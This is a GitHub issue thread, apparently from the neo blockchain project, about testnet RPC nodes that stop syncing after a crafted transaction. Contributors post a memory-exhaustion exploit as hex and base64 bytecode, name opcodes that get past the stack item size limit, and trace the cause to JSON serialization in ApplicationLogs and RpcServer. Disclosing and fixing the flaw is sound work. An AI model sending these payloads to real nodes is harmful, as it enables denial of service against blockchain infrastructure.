neo
neo copied to clipboard
all RPC nodes on testnet stopped syncing maybe caused by some modules
Describe the bug
Accidentally, we constructed a tx that leaves lots of large StackItems
on Result Stack. After sending that, all seed nodes stopped syncing.
To Reproduce
- sending a tx like this 0x40e171249642639be3e54dd6acfe5948b1d3f240f505e7a3403cdc9bd3e1068a
Expected behavior All nodes go well.
Screenshots
(Optional) Additional context We suspect that this is caused by some neo modules.
curl http://seed5t4.neo.org:20332 -d '{
"jsonrpc": "2.0",
"id": 1,
"method": "getblockcount",
"params": [
"0x40e171249642639be3e54dd6acfe5948b1d3f240f505e7a3403cdc9bd3e1068a"
]
}'
{"jsonrpc":"2.0","id":1,"result":1245636}
They all now stuck at 1245636.
seems it is because of bugs of plugins like application-log or something else ~
It should be a bug from applicationlog
since cli runs after I delete applicationlog
.
the script is:
0200001000884a4a4a ... 4a4a ;; (2047 * '4a')
The ResultStack
is 2GB
Based on @dusmart 's exploit,
construct a new exploit that requires 1024 GB of memory:
newbuffer, dup, dup,,,,,,,pack(from here, every stackitem is 1GB), dup, dup, dup, dup, dup
AgAAEACISkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkp KSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKS kpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkp KSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKS kpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkp KSkpKSkpKSkpKSkpKSkpKSkpKSgHoA8BKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKS kpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkp KSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKS kpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkp KSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpK
This script consumes incredible amount of memorys. oom on my 64GB memory machine.
I think the root cause is we only consider the cpu usage ignoring memory cost when set OpCode price.
OpCodes like NEWBUFFER
DUP
are fixed price no matter how many memory they use. Hence a script use 2G memory only cost 0.00013101gas.
construct a new exploit that requires 1024 GB of memory:
newbuffer, dup, dup,,,,,,,pack(from here, every stackitem is 1GB), dup, dup, dup, dup, dup
There is StackItem size limit https://github.com/neo-project/neo-vm/blob/b18e040d2115ed2ea3c9a60ae8722a7865b38927/src/neo-vm/ExecutionEngineLimits.cs#L39 You can't create a 1GB item. The maximum is about 1MB.
@ZhangTao1596 Nop, i checked the code, no size check under the PACK
OpCode
Just create 1024 1MB buffers, then pack them together,,,,,,,
Similar Opcodes that can bypass the size limitation:
PACKMAP PACKSTRUCT CAT
@Liaojinghui Can you look at https://github.com/neo-project/neo-vm/blob/b18e040d2115ed2ea3c9a60ae8722a7865b38927/src/neo-vm/ExecutionEngine.cs#L1643. I'm not sure if items packed are still count in ReferenceCounter.
@Liaojinghui Can you look at https://github.com/neo-project/neo-vm/blob/b18e040d2115ed2ea3c9a60ae8722a7865b38927/src/neo-vm/ExecutionEngine.cs#L1643. I'm not sure if items packed are still count in ReferenceCounter.
@ZhangTao1596 The MaxStackSize
here is the number of items
It wont stop you from having 2048 items of 1GB
BTW, to answer your question, packed items are remoted from ReferenceCounter, referenceCounter.RemoveStackReference(item);
/// <summary>
/// The maximum number of items that can be contained in the VM's evaluation stacks and slots.
/// </summary>
public uint MaxStackSize { get; init; } = 2 * 1024;
Based on @dusmart 's exploit,
construct a new exploit that requires 1024 GB of memory:
newbuffer, dup, dup,,,,,,,pack(from here, every stackitem is 1GB), dup, dup, dup, dup, dup
AgAAEACISkpKSkpKSkpK...
This script consumes incredible amount of memorys. oom on my 64GB memory machine.
Solution:
* set a size limit to `stackitem` or give every stack a maximum size. * check item size before pusing it to stack
By debugging on Windows, I found no significantly high memory usage during the whole VM execution. But there comes a memory leak at https://github.com/neo-project/neo-modules/blob/32aacc468ad43600817daabbec834e715017d962/src/RpcServer/RpcServer.SmartContract.cs#L78
json["stack"] = new JArray(engine.ResultStack.Select(p => ToJson(p, settings.MaxIteratorResultItems)));
if the script is called through RPC. Then we can suspect that https://github.com/neo-project/neo-modules/blob/32aacc468ad43600817daabbec834e715017d962/src/ApplicationLogs/LogReader.cs#L156
var txJson = TxLogToJson(appExec);
in plugin ApplicationLogs
, especially
https://github.com/neo-project/neo-modules/blob/32aacc468ad43600817daabbec834e715017d962/src/ApplicationLogs/LogReader.cs#L74
trigger["stack"] = appExec.Stack.Select(q => q.ToJson()).ToArray();
can lead to memory leak.
With 36 DUP
instructions constructing 37 1MB-buffers, the JString objects takes more than 100MB memory.
And there could be more memory cost when JObjects are turned into string.
We have to limit the items in the ResultStack in ApplicationLogs.
sending a tx like this 0x40e171249642639be3e54dd6acfe5948b1d3f240f505e7a3403cdc9bd3e1068a
NeoGo has no problem with this:
{
"id" : 5,
"result" : {
"executions" : [
{
"vmstate" : "HALT",
"trigger" : "Application",
"gasconsumed" : "13053",
"stack" : [
"error: unserializable: nil",
"error: unserializable: nil",
"error: unserializable: nil",
"error: unserializable: nil",
"error: unserializable: nil",
"error: unserializable: nil",
"error: unserializable: nil",
So our nodes never stopped and worked just fine.
newbuffer, dup, dup,,,,,,,pack(from here, every stackitem is 1GB), dup, dup, dup, dup, dup
But this script breaks the node, so it should be investigated.
newbuffer, dup, dup,,,,,,,pack(from here, every stackitem is 1GB), dup, dup, dup, dup, dup
But this script breaks the node, so it should be investigated.
And it's all purely JSONization issue, the script itself runs fine and does not consume a lot of memory as @Hecate2 already noticed, but an attempt to make a JSON out of it does.
I think we'll just limit the JSON size. We have two ways to JSONize stack items, one is used for StdLib's jsonSerialize
and another for user-facing things (like RPC) with the latter having type information. ToJSON
is size-limited (as well as conversion to binary representation, so I think the node would handle this script in a transaction fine), but ToJSONWithTypes
is not and that's what we're going to fix (optimizing it along the way, because ToJSON
is much faster in some cases).
@roman-khimov May you please test this case?
I don't think it differs a lot from the previous one, it'll all be fixed by nspcc-dev/neo-go#2386.
I think this one was solved quite a while ago and can be closed now.